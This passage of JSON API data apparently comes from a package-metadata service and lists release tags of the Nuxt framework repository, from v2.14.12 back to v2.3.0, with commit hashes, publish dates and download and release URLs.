/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z